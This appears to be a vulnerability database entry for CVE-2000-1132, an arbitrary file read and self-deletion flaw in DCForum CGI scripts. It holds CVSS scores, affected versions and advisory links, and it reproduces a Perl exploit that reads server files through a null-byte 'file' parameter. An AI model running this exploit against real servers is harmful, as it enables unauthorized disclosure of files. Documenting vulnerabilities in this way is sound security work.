CVE-2000-1132
CVSS 6.4
Published: 2001-01-09 00:00:00
Revised: 2008-09-05 16:22:44

[Original] DCForum cgforum.cgi CGI script allows remote attackers to read arbitrary files, and delete the program itself, via a malformed "forum" variable.


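[CNNVD] DCForum cgforum.cgi CGI script arbitrary file read and self-deletion vulnerability (CNNVD-200101-065)

        A vulnerability exists in the DCForum cgforum.cgi CGI script. A remote attacker can read arbitrary files and delete the program itself via a malformed "forum" variable.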

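- CVSS (base score)

CVSS score: 6.4 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]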

- CPE (affected platforms and products)

cpe:/a:dcscripts:dcforum:1.0
cpe:/a:dcscripts:dcforum:6.0
cpe:/a:dcscripts:dcforum:5.0
cpe:/a:dcscripts:dcforum:4.0
cpe:/a:dcscripts:dcforum:2.0
cpe:/a:dcscripts:dcforum:3.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1132
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1132
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-065
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1951
(VENDOR_ADVISORY)  BID  1951
http://archives.neohapsis.com/archives/bugtraq/2000-11/0218.html
(VENDOR_ADVISORY)  BUGTRAQ  20001114 Cgisecurity.com advisory on dcforum
http://www.dcscripts.com/dcforum/dcfNews/124.html#1
(UNKNOWN)  CONFIRM  http://www.dcscripts.com/dcforum/dcfNews/124.html#1
http://xforce.iss.net/xforce/xfdb/5533
(UNKNOWN)  XF  dcforum-cgi-view-files(5533)
http://www.osvdb.org/1646
(UNKNOWN)  OSVDB  1646

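- Vulnerability information

DCForum cgforum.cgi CGI script arbitrary file read and self-deletion vulnerability
Medium severity Unknown
2001-01-09 00:00:00 2005-10-12 00:00:00
Remote
        A vulnerability exists in the DCForum cgforum.cgi CGI script. A remote attacker can read arbitrary files and delete the program itself via a malformed "forum" variable.

- Advisories and patches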

        

- Vulnerability information (20405)

DCForum 1-6 Arbitrary File Disclosure Vulnerability (EDBID:20405)
cgi remote
2000-11-14 Verified
0 steeLe
N/A
source : http://www.securityfocus.com/bid/1951/info


DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.

The script improperly validates user-supplied input, which allows the remote viewing of arbitrary files on the host which are readable by user 'nobody' or the webserver. Additionally, it has been reported that the dcforum.cgi script can be made to delete itself if the attacker attempts to read its source code using this method, effectively permitting a denial-of-service attack.


#!/usr/bin/perl
# DC Forum Vulnerability (Found In Versions From 1.0 - 6.0 According To CGISecurity.com Advisory)
# Exploits Vulnerability That Allows Remote File Reading
# By SteeLe
# BEGIN { open(STDERR,">errors.txt"); } error checking
$lynx = "/usr/bin/lynx"; # specify

$site = $ARGV[0];
$cgi  = $ARGV[1];
$inet = inet_aton($site);

die "\n\t---   Usage:$0 <site> <cgi location,duh>  ---" if(@ARGV == '0' ||
@ARGV < 2);

print "\n\t---   DCForum 1.0 - 6.0 Exploit ---";
print "\n\t---   By the cool fellas at *   ---\n\n";

while(true) { # yea i think I stole this from the pollex.pl , uh thanks.

print "[dcforum]Option:";
$action = <STDIN>;
chomp($action);

print "Valid Options: r(read files, usage r <file>), q(quit)\n" if($action
ne "r" || $action ne "q");

if ($action eq "r") {
print "\nFile(to read):";
$file = <STDIN>;
chomp($file);
# Old fashion shit, and I was lazy so be happy
$url = "?az=list&file=$file%00";
$site = `$lynx http://$site$cgi$url`;
print $site;
}
elsif ($action eq "q") {
 print "now exiting program\n";
 exit;
  }
}
# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)]
		

- Vulnerability information

1646
DCForum dcboard.cgi forum Variable Arbitrary File Disclosure
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- Vulnerability description

DCForum contains a flaw that allows a remote attacker to view any arbitrary file on the web server. The issue is due to a lack of sanity checking on the "$r_in" variable in the dcboard.cgi and dcadmin.cgi scripts. Further, if an attacker attempts to view the source code of the dcforum.cgi script, it deletes itself.

- Timeline

2000-11-16 Unknown
2000-11-16 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability (contained in the advisory).

- Related references

- Vulnerability author

Unknown or Incomplete